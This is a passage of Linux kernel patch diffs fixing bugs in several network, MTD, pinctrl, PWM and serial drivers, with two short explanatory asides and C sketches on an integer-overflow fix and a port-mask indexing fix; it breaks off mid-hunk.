+@@ -102,7 +102,7 @@ static int parse_redboot_partitions(struct mtd_info *master,
+ 			offset -= master->erasesize;
+ 		}
+ 	} else {
+-		offset = directory * master->erasesize;
++		offset = (unsigned long) directory * master->erasesize;
+ 		while (mtd_block_isbad(master, offset)) {
+ 			offset += master->erasesize;
+ 			if (offset == master->size)
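
The redboot one-liner above is the classic multiply-before-widen overflow: directory and erasesize are 32-bit, so their product wraps modulo 2^32 before it is stored into the wider offset unless one operand is widened first. The kernel casts to unsigned long (64-bit on the affected configurations); the sketch below uses unsigned long long for portability, with values chosen to force the wrap:

#include <stdint.h>
#include <stdio.h>

int main(void)
{
	int directory = 40000;			/* erase-block index */
	uint32_t erasesize = 128 * 1024;	/* 128 KiB erase blocks */
	uint64_t bad, good;

	/* the 32-bit multiply wraps first, then widens */
	bad = directory * erasesize;
	/* widening one operand first keeps the full product */
	good = (unsigned long long)directory * erasesize;

	printf("bad  = 0x%llx\n", (unsigned long long)bad);	/* 0x38800000 */
	printf("good = 0x%llx\n", (unsigned long long)good);	/* 0x138800000 */
	return 0;
}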
+diff --git a/drivers/net/can/spi/mcp251xfd/mcp251xfd-core.c b/drivers/net/can/spi/mcp251xfd/mcp251xfd-core.c
+index eebf967f4711a..1665f78abb5c9 100644
+--- a/drivers/net/can/spi/mcp251xfd/mcp251xfd-core.c
++++ b/drivers/net/can/spi/mcp251xfd/mcp251xfd-core.c
+@@ -1618,11 +1618,20 @@ static int mcp251xfd_open(struct net_device *ndev)
+ 	clear_bit(MCP251XFD_FLAGS_DOWN, priv->flags);
+ 	can_rx_offload_enable(&priv->offload);
+ 
++	priv->wq = alloc_ordered_workqueue("%s-mcp251xfd_wq",
++					   WQ_FREEZABLE | WQ_MEM_RECLAIM,
++					   dev_name(&spi->dev));
++	if (!priv->wq) {
++		err = -ENOMEM;
++		goto out_can_rx_offload_disable;
++	}
++	INIT_WORK(&priv->tx_work, mcp251xfd_tx_obj_write_sync);
++
+ 	err = request_threaded_irq(spi->irq, NULL, mcp251xfd_irq,
+ 				   IRQF_SHARED | IRQF_ONESHOT,
+ 				   dev_name(&spi->dev), priv);
+ 	if (err)
+-		goto out_can_rx_offload_disable;
++		goto out_destroy_workqueue;
+ 
+ 	err = mcp251xfd_chip_interrupts_enable(priv);
+ 	if (err)
+@@ -1634,6 +1643,8 @@ static int mcp251xfd_open(struct net_device *ndev)
+ 
+  out_free_irq:
+ 	free_irq(spi->irq, priv);
++ out_destroy_workqueue:
++	destroy_workqueue(priv->wq);
+  out_can_rx_offload_disable:
+ 	can_rx_offload_disable(&priv->offload);
+ 	set_bit(MCP251XFD_FLAGS_DOWN, priv->flags);
+@@ -1661,6 +1672,7 @@ static int mcp251xfd_stop(struct net_device *ndev)
+ 	hrtimer_cancel(&priv->tx_irq_timer);
+ 	mcp251xfd_chip_interrupts_disable(priv);
+ 	free_irq(ndev->irq, priv);
++	destroy_workqueue(priv->wq);
+ 	can_rx_offload_disable(&priv->offload);
+ 	mcp251xfd_timestamp_stop(priv);
+ 	mcp251xfd_chip_stop(priv, CAN_STATE_STOPPED);
+diff --git a/drivers/net/can/spi/mcp251xfd/mcp251xfd-tx.c b/drivers/net/can/spi/mcp251xfd/mcp251xfd-tx.c
+index 160528d3cc26b..b1de8052a45cc 100644
+--- a/drivers/net/can/spi/mcp251xfd/mcp251xfd-tx.c
++++ b/drivers/net/can/spi/mcp251xfd/mcp251xfd-tx.c
+@@ -131,6 +131,39 @@ mcp251xfd_tx_obj_from_skb(const struct mcp251xfd_priv *priv,
+ 	tx_obj->xfer[0].len = len;
+ }
+ 
++static void mcp251xfd_tx_failure_drop(const struct mcp251xfd_priv *priv,
++				      struct mcp251xfd_tx_ring *tx_ring,
++				      int err)
++{
++	struct net_device *ndev = priv->ndev;
++	struct net_device_stats *stats = &ndev->stats;
++	unsigned int frame_len = 0;
++	u8 tx_head;
++
++	tx_ring->head--;
++	stats->tx_dropped++;
++	tx_head = mcp251xfd_get_tx_head(tx_ring);
++	can_free_echo_skb(ndev, tx_head, &frame_len);
++	netdev_completed_queue(ndev, 1, frame_len);
++	netif_wake_queue(ndev);
++
++	if (net_ratelimit())
++		netdev_err(priv->ndev, "ERROR in %s: %d\n", __func__, err);
++}
++
++void mcp251xfd_tx_obj_write_sync(struct work_struct *work)
++{
++	struct mcp251xfd_priv *priv = container_of(work, struct mcp251xfd_priv,
++						   tx_work);
++	struct mcp251xfd_tx_obj *tx_obj = priv->tx_work_obj;
++	struct mcp251xfd_tx_ring *tx_ring = priv->tx;
++	int err;
++
++	err = spi_sync(priv->spi, &tx_obj->msg);
++	if (err)
++		mcp251xfd_tx_failure_drop(priv, tx_ring, err);
++}
++
+ static int mcp251xfd_tx_obj_write(const struct mcp251xfd_priv *priv,
+ 				  struct mcp251xfd_tx_obj *tx_obj)
+ {
+@@ -162,6 +195,11 @@ static bool mcp251xfd_tx_busy(const struct mcp251xfd_priv *priv,
+ 	return false;
+ }
+ 
++static bool mcp251xfd_work_busy(struct work_struct *work)
++{
++	return work_busy(work);
++}
++
+ netdev_tx_t mcp251xfd_start_xmit(struct sk_buff *skb,
+ 				 struct net_device *ndev)
+ {
+@@ -175,7 +213,8 @@ netdev_tx_t mcp251xfd_start_xmit(struct sk_buff *skb,
+ 	if (can_dev_dropped_skb(ndev, skb))
+ 		return NETDEV_TX_OK;
+ 
+-	if (mcp251xfd_tx_busy(priv, tx_ring))
++	if (mcp251xfd_tx_busy(priv, tx_ring) ||
++	    mcp251xfd_work_busy(&priv->tx_work))
+ 		return NETDEV_TX_BUSY;
+ 
+ 	tx_obj = mcp251xfd_get_tx_obj_next(tx_ring);
+@@ -193,13 +232,13 @@ netdev_tx_t mcp251xfd_start_xmit(struct sk_buff *skb,
+ 		netdev_sent_queue(priv->ndev, frame_len);
+ 
+ 	err = mcp251xfd_tx_obj_write(priv, tx_obj);
+-	if (err)
+-		goto out_err;
+-
+-	return NETDEV_TX_OK;
+-
+- out_err:
+-	netdev_err(priv->ndev, "ERROR in %s: %d\n", __func__, err);
++	if (err == -EBUSY) {
++		netif_stop_queue(ndev);
++		priv->tx_work_obj = tx_obj;
++		queue_work(priv->wq, &priv->tx_work);
++	} else if (err) {
++		mcp251xfd_tx_failure_drop(priv, tx_ring, err);
++	}
+ 
+ 	return NETDEV_TX_OK;
+ }
+diff --git a/drivers/net/can/spi/mcp251xfd/mcp251xfd.h b/drivers/net/can/spi/mcp251xfd/mcp251xfd.h
+index ba0fd2b95a52a..b98ded7098a5a 100644
+--- a/drivers/net/can/spi/mcp251xfd/mcp251xfd.h
++++ b/drivers/net/can/spi/mcp251xfd/mcp251xfd.h
+@@ -628,6 +628,10 @@ struct mcp251xfd_priv {
+ 	struct mcp251xfd_rx_ring *rx[MCP251XFD_FIFO_RX_NUM];
+ 	struct mcp251xfd_tx_ring tx[MCP251XFD_FIFO_TX_NUM];
+ 
++	struct workqueue_struct *wq;
++	struct work_struct tx_work;
++	struct mcp251xfd_tx_obj *tx_work_obj;
++
+ 	DECLARE_BITMAP(flags, __MCP251XFD_FLAGS_SIZE__);
+ 
+ 	u8 rx_ring_num;
+@@ -934,6 +938,7 @@ void mcp251xfd_skb_set_timestamp(const struct mcp251xfd_priv *priv,
+ void mcp251xfd_timestamp_init(struct mcp251xfd_priv *priv);
+ void mcp251xfd_timestamp_stop(struct mcp251xfd_priv *priv);
+ 
++void mcp251xfd_tx_obj_write_sync(struct work_struct *work);
+ netdev_tx_t mcp251xfd_start_xmit(struct sk_buff *skb,
+ 				 struct net_device *ndev);
+ 
+diff --git a/drivers/net/dsa/microchip/ksz9477.c b/drivers/net/dsa/microchip/ksz9477.c
+index a736971470534..e9fa92a833227 100644
+--- a/drivers/net/dsa/microchip/ksz9477.c
++++ b/drivers/net/dsa/microchip/ksz9477.c
+@@ -183,10 +183,8 @@ int ksz9477_reset_switch(struct ksz_device *dev)
+ 			   SPI_AUTO_EDGE_DETECTION, 0);
+ 
+ 	/* default configuration */
+-	ksz_read8(dev, REG_SW_LUE_CTRL_1, &data8);
+-	data8 = SW_AGING_ENABLE | SW_LINK_AUTO_AGING |
+-	      SW_SRC_ADDR_FILTER | SW_FLUSH_STP_TABLE | SW_FLUSH_MSTP_TABLE;
+-	ksz_write8(dev, REG_SW_LUE_CTRL_1, data8);
++	ksz_write8(dev, REG_SW_LUE_CTRL_1,
++		   SW_AGING_ENABLE | SW_LINK_AUTO_AGING | SW_SRC_ADDR_FILTER);
+ 
+ 	/* disable interrupts */
+ 	ksz_write32(dev, REG_SW_INT_MASK__4, SWITCH_INT_MASK);
+@@ -1152,6 +1150,10 @@ int ksz9477_setup(struct dsa_switch *ds)
+ 	/* Enable REG_SW_MTU__2 reg by setting SW_JUMBO_PACKET */
+ 	ksz_cfg(dev, REG_SW_MAC_CTRL_1, SW_JUMBO_PACKET, true);
+ 
++	/* Use collision based back pressure mode. */
++	ksz_cfg(dev, REG_SW_MAC_CTRL_1, SW_BACK_PRESSURE,
++		SW_BACK_PRESSURE_COLLISION);
++
+ 	/* Now we can configure default MTU value */
+ 	ret = regmap_update_bits(dev->regmap[1], REG_SW_MTU__2, REG_SW_MTU_MASK,
+ 				 VLAN_ETH_FRAME_LEN + ETH_FCS_LEN);
+diff --git a/drivers/net/dsa/microchip/ksz9477_reg.h b/drivers/net/dsa/microchip/ksz9477_reg.h
+index 53c68d286dd3a..04086e9ab0a0f 100644
+--- a/drivers/net/dsa/microchip/ksz9477_reg.h
++++ b/drivers/net/dsa/microchip/ksz9477_reg.h
+@@ -267,6 +267,7 @@
+ #define REG_SW_MAC_CTRL_1		0x0331
+ 
+ #define SW_BACK_PRESSURE		BIT(5)
++#define SW_BACK_PRESSURE_COLLISION	0
+ #define FAIR_FLOW_CTRL			BIT(4)
+ #define NO_EXC_COLLISION_DROP		BIT(3)
+ #define SW_JUMBO_PACKET			BIT(2)
+diff --git a/drivers/net/dsa/microchip/ksz_common.c b/drivers/net/dsa/microchip/ksz_common.c
+index f9f43897f86c1..9dbe188f09c3c 100644
+--- a/drivers/net/dsa/microchip/ksz_common.c
++++ b/drivers/net/dsa/microchip/ksz_common.c
+@@ -1790,7 +1790,7 @@ static void ksz_irq_bus_sync_unlock(struct irq_data *d)
+ 	struct ksz_device *dev = kirq->dev;
+ 	int ret;
+ 
+-	ret = ksz_write32(dev, kirq->reg_mask, kirq->masked);
++	ret = ksz_write8(dev, kirq->reg_mask, kirq->masked);
+ 	if (ret)
+ 		dev_err(dev->dev, "failed to change IRQ mask\n");
+ 
+diff --git a/drivers/net/ethernet/freescale/dpaa2/dpaa2-eth.c b/drivers/net/ethernet/freescale/dpaa2/dpaa2-eth.c
+index de62eee58a00e..bbbe7c5b5d35a 100644
+--- a/drivers/net/ethernet/freescale/dpaa2/dpaa2-eth.c
++++ b/drivers/net/ethernet/freescale/dpaa2/dpaa2-eth.c
+@@ -2754,11 +2754,14 @@ static int dpaa2_eth_xdp_xmit(struct net_device *net_dev, int n,
+ static int update_xps(struct dpaa2_eth_priv *priv)
+ {
+ 	struct net_device *net_dev = priv->net_dev;
+-	struct cpumask xps_mask;
+-	struct dpaa2_eth_fq *fq;
+ 	int i, num_queues, netdev_queues;
++	struct dpaa2_eth_fq *fq;
++	cpumask_var_t xps_mask;
+ 	int err = 0;
+ 
++	if (!alloc_cpumask_var(&xps_mask, GFP_KERNEL))
++		return -ENOMEM;
++
+ 	num_queues = dpaa2_eth_queue_count(priv);
+ 	netdev_queues = (net_dev->num_tc ? : 1) * num_queues;
+ 
+@@ -2768,16 +2771,17 @@ static int update_xps(struct dpaa2_eth_priv *priv)
+ 	for (i = 0; i < netdev_queues; i++) {
+ 		fq = &priv->fq[i % num_queues];
+ 
+-		cpumask_clear(&xps_mask);
+-		cpumask_set_cpu(fq->target_cpu, &xps_mask);
++		cpumask_clear(xps_mask);
++		cpumask_set_cpu(fq->target_cpu, xps_mask);
+ 
+-		err = netif_set_xps_queue(net_dev, &xps_mask, i);
++		err = netif_set_xps_queue(net_dev, xps_mask, i);
+ 		if (err) {
+ 			netdev_warn_once(net_dev, "Error setting XPS queue\n");
+ 			break;
+ 		}
+ 	}
+ 
++	free_cpumask_var(xps_mask);
+ 	return err;
+ }
+ 
+diff --git a/drivers/net/ethernet/ibm/ibmvnic.c b/drivers/net/ethernet/ibm/ibmvnic.c
+index 157be4e9be4b7..8f377d0a80fe6 100644
+--- a/drivers/net/ethernet/ibm/ibmvnic.c
++++ b/drivers/net/ethernet/ibm/ibmvnic.c
+@@ -3859,6 +3859,12 @@ static void release_sub_crqs(struct ibmvnic_adapter *adapter, bool do_h_free)
+ 		adapter->num_active_tx_scrqs = 0;
+ 	}
+ 
++	/* Clean up any remaining outstanding SKBs;
++	 * we freed the IRQ, so we won't be
++	 * hearing from them.
++	 */
++	clean_tx_pools(adapter);
++
+ 	if (adapter->rx_scrq) {
+ 		for (i = 0; i < adapter->num_active_rx_scrqs; i++) {
+ 			if (!adapter->rx_scrq[i])
+diff --git a/drivers/net/ethernet/mellanox/mlxsw/spectrum_buffers.c b/drivers/net/ethernet/mellanox/mlxsw/spectrum_buffers.c
+index c9f1c79f3f9d0..ba090262e27ef 100644
+--- a/drivers/net/ethernet/mellanox/mlxsw/spectrum_buffers.c
++++ b/drivers/net/ethernet/mellanox/mlxsw/spectrum_buffers.c
+@@ -1607,8 +1607,8 @@ static void mlxsw_sp_sb_sr_occ_query_cb(struct mlxsw_core *mlxsw_core,
+ int mlxsw_sp_sb_occ_snapshot(struct mlxsw_core *mlxsw_core,
+ 			     unsigned int sb_index)
+ {
++	u16 local_port, local_port_1, first_local_port, last_local_port;
+ 	struct mlxsw_sp *mlxsw_sp = mlxsw_core_driver_priv(mlxsw_core);
+-	u16 local_port, local_port_1, last_local_port;
+ 	struct mlxsw_sp_sb_sr_occ_query_cb_ctx cb_ctx;
+ 	u8 masked_count, current_page = 0;
+ 	unsigned long cb_priv = 0;
+@@ -1628,6 +1628,7 @@ int mlxsw_sp_sb_occ_snapshot(struct mlxsw_core *mlxsw_core,
+ 	masked_count = 0;
+ 	mlxsw_reg_sbsr_pack(sbsr_pl, false);
+ 	mlxsw_reg_sbsr_port_page_set(sbsr_pl, current_page);
++	first_local_port = current_page * MLXSW_REG_SBSR_NUM_PORTS_IN_PAGE;
+ 	last_local_port = current_page * MLXSW_REG_SBSR_NUM_PORTS_IN_PAGE +
+ 			  MLXSW_REG_SBSR_NUM_PORTS_IN_PAGE - 1;
+ 
+@@ -1645,9 +1646,12 @@ int mlxsw_sp_sb_occ_snapshot(struct mlxsw_core *mlxsw_core,
+ 		if (local_port != MLXSW_PORT_CPU_PORT) {
+ 			/* Ingress quotas are not supported for the CPU port */
+ 			mlxsw_reg_sbsr_ingress_port_mask_set(sbsr_pl,
+-							     local_port, 1);
++							     local_port - first_local_port,
++							     1);
+ 		}
+-		mlxsw_reg_sbsr_egress_port_mask_set(sbsr_pl, local_port, 1);
++		mlxsw_reg_sbsr_egress_port_mask_set(sbsr_pl,
++						    local_port - first_local_port,
++						    1);
+ 		for (i = 0; i < mlxsw_sp->sb_vals->pool_count; i++) {
+ 			err = mlxsw_sp_sb_pm_occ_query(mlxsw_sp, local_port, i,
+ 						       &bulk_list);
+@@ -1684,7 +1688,7 @@ int mlxsw_sp_sb_occ_max_clear(struct mlxsw_core *mlxsw_core,
+ 			      unsigned int sb_index)
+ {
+ 	struct mlxsw_sp *mlxsw_sp = mlxsw_core_driver_priv(mlxsw_core);
+-	u16 local_port, last_local_port;
++	u16 local_port, first_local_port, last_local_port;
+ 	LIST_HEAD(bulk_list);
+ 	unsigned int masked_count;
+ 	u8 current_page = 0;
+@@ -1702,6 +1706,7 @@ int mlxsw_sp_sb_occ_max_clear(struct mlxsw_core *mlxsw_core,
+ 	masked_count = 0;
+ 	mlxsw_reg_sbsr_pack(sbsr_pl, true);
+ 	mlxsw_reg_sbsr_port_page_set(sbsr_pl, current_page);
++	first_local_port = current_page * MLXSW_REG_SBSR_NUM_PORTS_IN_PAGE;
+ 	last_local_port = current_page * MLXSW_REG_SBSR_NUM_PORTS_IN_PAGE +
+ 			  MLXSW_REG_SBSR_NUM_PORTS_IN_PAGE - 1;
+ 
+@@ -1719,9 +1724,12 @@ int mlxsw_sp_sb_occ_max_clear(struct mlxsw_core *mlxsw_core,
+ 		if (local_port != MLXSW_PORT_CPU_PORT) {
+ 			/* Ingress quotas are not supported for the CPU port */
+ 			mlxsw_reg_sbsr_ingress_port_mask_set(sbsr_pl,
+-							     local_port, 1);
++							     local_port - first_local_port,
++							     1);
+ 		}
+-		mlxsw_reg_sbsr_egress_port_mask_set(sbsr_pl, local_port, 1);
++		mlxsw_reg_sbsr_egress_port_mask_set(sbsr_pl,
++						    local_port - first_local_port,
++						    1);
+ 		for (i = 0; i < mlxsw_sp->sb_vals->pool_count; i++) {
+ 			err = mlxsw_sp_sb_pm_occ_clear(mlxsw_sp, local_port, i,
+ 						       &bulk_list);
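
Both mlxsw hunks above make the same correction: the SBSR ingress/egress port masks are indexed relative to the current page, so local port N on page P maps to bit N - P * ports_per_page rather than bit N. A tiny sketch of the index math (the 256-ports-per-page figure is an assumption standing in for MLXSW_REG_SBSR_NUM_PORTS_IN_PAGE):

#include <stdio.h>

#define PORTS_IN_PAGE	256	/* assumed per-page mask width */

/* Bit position of @local_port inside the SBSR mask of its own page. */
static int page_relative_port(int local_port)
{
	int first_local_port = (local_port / PORTS_IN_PAGE) * PORTS_IN_PAGE;

	return local_port - first_local_port;
}

int main(void)
{
	printf("%d\n", page_relative_port(10));		/* page 0, bit 10 */
	printf("%d\n", page_relative_port(300));	/* page 1, bit 44 */
	return 0;
}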
+diff --git a/drivers/net/phy/micrel.c b/drivers/net/phy/micrel.c
+index 98c6d0caf8faf..90f3953cf9066 100644
+--- a/drivers/net/phy/micrel.c
++++ b/drivers/net/phy/micrel.c
+@@ -3405,6 +3405,7 @@ static struct mdio_device_id __maybe_unused micrel_tbl[] = {
+ 	{ PHY_ID_KSZ8081, MICREL_PHY_ID_MASK },
+ 	{ PHY_ID_KSZ8873MLL, MICREL_PHY_ID_MASK },
+ 	{ PHY_ID_KSZ886X, MICREL_PHY_ID_MASK },
++	{ PHY_ID_KSZ9477, MICREL_PHY_ID_MASK },
+ 	{ PHY_ID_LAN8814, MICREL_PHY_ID_MASK },
+ 	{ PHY_ID_LAN8804, MICREL_PHY_ID_MASK },
+ 	{ }
+diff --git a/drivers/net/usb/ax88179_178a.c b/drivers/net/usb/ax88179_178a.c
+index 53f6efc22f5c9..73de34179f352 100644
+--- a/drivers/net/usb/ax88179_178a.c
++++ b/drivers/net/usb/ax88179_178a.c
+@@ -326,7 +326,8 @@ static void ax88179_status(struct usbnet *dev, struct urb *urb)
+ 
+ 	if (netif_carrier_ok(dev->net) != link) {
+ 		usbnet_link_change(dev, link, 1);
+-		netdev_info(dev->net, "ax88179 - Link status is: %d\n", link);
++		if (!link)
++			netdev_info(dev->net, "ax88179 - Link status is: 0\n");
+ 	}
+ }
+ 
+@@ -1540,6 +1541,7 @@ static int ax88179_link_reset(struct usbnet *dev)
+ 			 GMII_PHY_PHYSR, 2, &tmp16);
+ 
+ 	if (!(tmp16 & GMII_PHY_PHYSR_LINK)) {
++		netdev_info(dev->net, "ax88179 - Link status is: 0\n");
+ 		return 0;
+ 	} else if (GMII_PHY_PHYSR_GIGA == (tmp16 & GMII_PHY_PHYSR_SMASK)) {
+ 		mode |= AX_MEDIUM_GIGAMODE | AX_MEDIUM_EN_125MHZ;
+@@ -1577,6 +1579,8 @@ static int ax88179_link_reset(struct usbnet *dev)
+ 
+ 	netif_carrier_on(dev->net);
+ 
++	netdev_info(dev->net, "ax88179 - Link status is: 1\n");
++
+ 	return 0;
+ }
+ 
+diff --git a/drivers/pinctrl/core.c b/drivers/pinctrl/core.c
+index 223482584f54f..db5fc55a5c964 100644
+--- a/drivers/pinctrl/core.c
++++ b/drivers/pinctrl/core.c
+@@ -1092,8 +1092,8 @@ static struct pinctrl *create_pinctrl(struct device *dev,
+ 		 * an -EPROBE_DEFER later, as that is the worst case.
+ 		 */
+ 		if (ret == -EPROBE_DEFER) {
+-			pinctrl_free(p, false);
+ 			mutex_unlock(&pinctrl_maps_mutex);
++			pinctrl_free(p, false);
+ 			return ERR_PTR(ret);
+ 		}
+ 	}
+diff --git a/drivers/pinctrl/pinctrl-rockchip.c b/drivers/pinctrl/pinctrl-rockchip.c
+index 0276b52f37168..d26682f21ad1e 100644
+--- a/drivers/pinctrl/pinctrl-rockchip.c
++++ b/drivers/pinctrl/pinctrl-rockchip.c
+@@ -635,23 +635,68 @@ static struct rockchip_mux_recalced_data rk3308_mux_recalced_data[] = {
+ 
+ static struct rockchip_mux_recalced_data rk3328_mux_recalced_data[] = {
+ 	{
+-		.num = 2,
+-		.pin = 12,
+-		.reg = 0x24,
+-		.bit = 8,
+-		.mask = 0x3
+-	}, {
++		/* gpio2_b7_sel */
+ 		.num = 2,
+ 		.pin = 15,
+ 		.reg = 0x28,
+ 		.bit = 0,
+ 		.mask = 0x7
+ 	}, {
++		/* gpio2_c7_sel */
+ 		.num = 2,
+ 		.pin = 23,
+ 		.reg = 0x30,
+ 		.bit = 14,
+ 		.mask = 0x3
++	}, {
++		/* gpio3_b1_sel */
++		.num = 3,
++		.pin = 9,
++		.reg = 0x44,
++		.bit = 2,
++		.mask = 0x3
++	}, {
++		/* gpio3_b2_sel */
++		.num = 3,
++		.pin = 10,
++		.reg = 0x44,
++		.bit = 4,
++		.mask = 0x3
++	}, {
++		/* gpio3_b3_sel */
++		.num = 3,
++		.pin = 11,
++		.reg = 0x44,
++		.bit = 6,
++		.mask = 0x3
++	}, {
++		/* gpio3_b4_sel */
++		.num = 3,
++		.pin = 12,
++		.reg = 0x44,
++		.bit = 8,
++		.mask = 0x3
++	}, {
++		/* gpio3_b5_sel */
++		.num = 3,
++		.pin = 13,
++		.reg = 0x44,
++		.bit = 10,
++		.mask = 0x3
++	}, {
++		/* gpio3_b6_sel */
++		.num = 3,
++		.pin = 14,
++		.reg = 0x44,
++		.bit = 12,
++		.mask = 0x3
++	}, {
++		/* gpio3_b7_sel */
++		.num = 3,
++		.pin = 15,
++		.reg = 0x44,
++		.bit = 14,
++		.mask = 0x3
+ 	},
+ };
+ 
+@@ -2434,6 +2479,7 @@ static int rockchip_get_pull(struct rockchip_pin_bank *bank, int pin_num)
+ 	case RK3188:
+ 	case RK3288:
+ 	case RK3308:
++	case RK3328:
+ 	case RK3368:
+ 	case RK3399:
+ 	case RK3568:
+@@ -2492,6 +2538,7 @@ static int rockchip_set_pull(struct rockchip_pin_bank *bank,
+ 	case RK3188:
+ 	case RK3288:
+ 	case RK3308:
++	case RK3328:
+ 	case RK3368:
+ 	case RK3399:
+ 	case RK3568:
+@@ -2705,8 +2752,10 @@ static int rockchip_pmx_set(struct pinctrl_dev *pctldev, unsigned selector,
+ 
+ 	if (ret) {
+ 		/* revert the already done pin settings */
+-		for (cnt--; cnt >= 0; cnt--)
++		for (cnt--; cnt >= 0; cnt--) {
++			bank = pin_to_bank(info, pins[cnt]);
+ 			rockchip_set_mux(bank, pins[cnt] - bank->pin_base, 0);
++		}
+ 
+ 		return ret;
+ 	}
+@@ -2754,6 +2803,7 @@ static bool rockchip_pinconf_pull_valid(struct rockchip_pin_ctrl *ctrl,
+ 	case RK3188:
+ 	case RK3288:
+ 	case RK3308:
++	case RK3328:
+ 	case RK3368:
+ 	case RK3399:
+ 	case RK3568:
+@@ -3766,7 +3816,7 @@ static struct rockchip_pin_bank rk3328_pin_banks[] = {
+ 	PIN_BANK_IOMUX_FLAGS(0, 32, "gpio0", 0, 0, 0, 0),
+ 	PIN_BANK_IOMUX_FLAGS(1, 32, "gpio1", 0, 0, 0, 0),
+ 	PIN_BANK_IOMUX_FLAGS(2, 32, "gpio2", 0,
+-			     IOMUX_WIDTH_3BIT,
++			     0,
+ 			     IOMUX_WIDTH_3BIT,
+ 			     0),
+ 	PIN_BANK_IOMUX_FLAGS(3, 32, "gpio3",
+@@ -3780,7 +3830,7 @@ static struct rockchip_pin_ctrl rk3328_pin_ctrl = {
+ 		.pin_banks		= rk3328_pin_banks,
+ 		.nr_banks		= ARRAY_SIZE(rk3328_pin_banks),
+ 		.label			= "RK3328-GPIO",
+-		.type			= RK3288,
++		.type			= RK3328,
+ 		.grf_mux_offset		= 0x0,
+ 		.iomux_recalced		= rk3328_mux_recalced_data,
+ 		.niomux_recalced	= ARRAY_SIZE(rk3328_mux_recalced_data),
+diff --git a/drivers/pinctrl/pinctrl-rockchip.h b/drivers/pinctrl/pinctrl-rockchip.h
+index 4759f336941ef..849266f8b1913 100644
+--- a/drivers/pinctrl/pinctrl-rockchip.h
++++ b/drivers/pinctrl/pinctrl-rockchip.h
+@@ -193,6 +193,7 @@ enum rockchip_pinctrl_type {
+ 	RK3188,
+ 	RK3288,
+ 	RK3308,
++	RK3328,
+ 	RK3368,
+ 	RK3399,
+ 	RK3568,
+diff --git a/drivers/pinctrl/qcom/pinctrl-spmi-gpio.c b/drivers/pinctrl/qcom/pinctrl-spmi-gpio.c
+index 8c31a8f6b7e4e..6d43c2123e69a 100644
+--- a/drivers/pinctrl/qcom/pinctrl-spmi-gpio.c
++++ b/drivers/pinctrl/qcom/pinctrl-spmi-gpio.c
+@@ -1204,7 +1204,6 @@ static const struct of_device_id pmic_gpio_of_match[] = {
+ 	{ .compatible = "qcom,pm7250b-gpio", .data = (void *) 12 },
+ 	{ .compatible = "qcom,pm7325-gpio", .data = (void *) 10 },
+ 	{ .compatible = "qcom,pm8005-gpio", .data = (void *) 4 },
+-	{ .compatible = "qcom,pm8008-gpio", .data = (void *) 2 },
+ 	{ .compatible = "qcom,pm8019-gpio", .data = (void *) 6 },
+ 	/* pm8150 has 10 GPIOs with holes on 2, 5, 7 and 8 */
+ 	{ .compatible = "qcom,pm8150-gpio", .data = (void *) 10 },
+diff --git a/drivers/pwm/pwm-stm32.c b/drivers/pwm/pwm-stm32.c
+index bdcdb7f38312b..c40a6548ce7d4 100644
+--- a/drivers/pwm/pwm-stm32.c
++++ b/drivers/pwm/pwm-stm32.c
+@@ -340,6 +340,9 @@ static int stm32_pwm_config(struct stm32_pwm *priv, int ch,
+ 
+ 	prd = div;
+ 
++	if (!prd)
++		return -EINVAL;
++
+ 	if (prescaler > MAX_TIM_PSC)
+ 		return -EINVAL;
+ 
+diff --git a/drivers/soc/ti/wkup_m3_ipc.c b/drivers/soc/ti/wkup_m3_ipc.c
+index 343c58ed58961..103d793bae748 100644
+--- a/drivers/soc/ti/wkup_m3_ipc.c
++++ b/drivers/soc/ti/wkup_m3_ipc.c
+@@ -16,7 +16,6 @@
+ #include <linux/irq.h>
+ #include <linux/module.h>
+ #include <linux/of.h>
+-#include <linux/omap-mailbox.h>
+ #include <linux/platform_device.h>
+ #include <linux/remoteproc.h>
+ #include <linux/suspend.h>
+@@ -314,7 +313,6 @@ static irqreturn_t wkup_m3_txev_handler(int irq, void *ipc_data)
+ static int wkup_m3_ping(struct wkup_m3_ipc *m3_ipc)
+ {
+ 	struct device *dev = m3_ipc->dev;
+-	mbox_msg_t dummy_msg = 0;
+ 	int ret;
+ 
+ 	if (!m3_ipc->mbox) {
+@@ -330,7 +328,7 @@ static int wkup_m3_ping(struct wkup_m3_ipc *m3_ipc)
+ 	 * the RX callback to avoid multiple interrupts being received
+ 	 * by the CM3.
+ 	 */
+-	ret = mbox_send_message(m3_ipc->mbox, &dummy_msg);
++	ret = mbox_send_message(m3_ipc->mbox, NULL);
+ 	if (ret < 0) {
+ 		dev_err(dev, "%s: mbox_send_message() failed: %d\n",
+ 			__func__, ret);
+@@ -352,7 +350,6 @@ static int wkup_m3_ping(struct wkup_m3_ipc *m3_ipc)
+ static int wkup_m3_ping_noirq(struct wkup_m3_ipc *m3_ipc)
+ {
+ 	struct device *dev = m3_ipc->dev;
+-	mbox_msg_t dummy_msg = 0;
+ 	int ret;
+ 
+ 	if (!m3_ipc->mbox) {
+@@ -361,7 +358,7 @@ static int wkup_m3_ping_noirq(struct wkup_m3_ipc *m3_ipc)
+ 		return -EIO;
+ 	}
+ 
+-	ret = mbox_send_message(m3_ipc->mbox, &dummy_msg);
++	ret = mbox_send_message(m3_ipc->mbox, NULL);
+ 	if (ret < 0) {
+ 		dev_err(dev, "%s: mbox_send_message() failed: %d\n",
+ 			__func__, ret);
+diff --git a/drivers/tty/serial/8250/8250_omap.c b/drivers/tty/serial/8250/8250_omap.c
+index 037d613006f56..a3eaf293f2048 100644
+--- a/drivers/tty/serial/8250/8250_omap.c
++++ b/drivers/tty/serial/8250/8250_omap.c
+@@ -159,6 +159,10 @@ static u32 uart_read(struct omap8250_priv *priv, u32 reg)
+ 	return readl(priv->membase + (reg << OMAP_UART_REGSHIFT));
+ }
+ 
++/* Timeout Low and High */
++#define UART_OMAP_TO_L                 0x26
++#define UART_OMAP_TO_H                 0x27
++
+ /*
+  * Called on runtime PM resume path from omap8250_restore_regs(), and
+  * omap8250_set_mctrl().
+@@ -628,13 +632,25 @@ static irqreturn_t omap8250_irq(int irq, void *dev_id)
+ 
+ 	/*
+ 	 * On K3 SoCs, it is observed that RX TIMEOUT is signalled after
+-	 * FIFO has been drained, in which case a dummy read of RX FIFO
+-	 * is required to clear RX TIMEOUT condition.
++	 * the FIFO has been drained, or even spuriously.
++	 * So apply the workaround for Errata i2310 described in
++	 * https://www.ti.com/lit/pdf/sprz536
+ 	 */
+ 	if (priv->habit & UART_RX_TIMEOUT_QUIRK &&
+ 	    (iir & UART_IIR_RX_TIMEOUT) == UART_IIR_RX_TIMEOUT &&
+ 	    serial_port_in(port, UART_OMAP_RX_LVL) == 0) {
+-		serial_port_in(port, UART_RX);
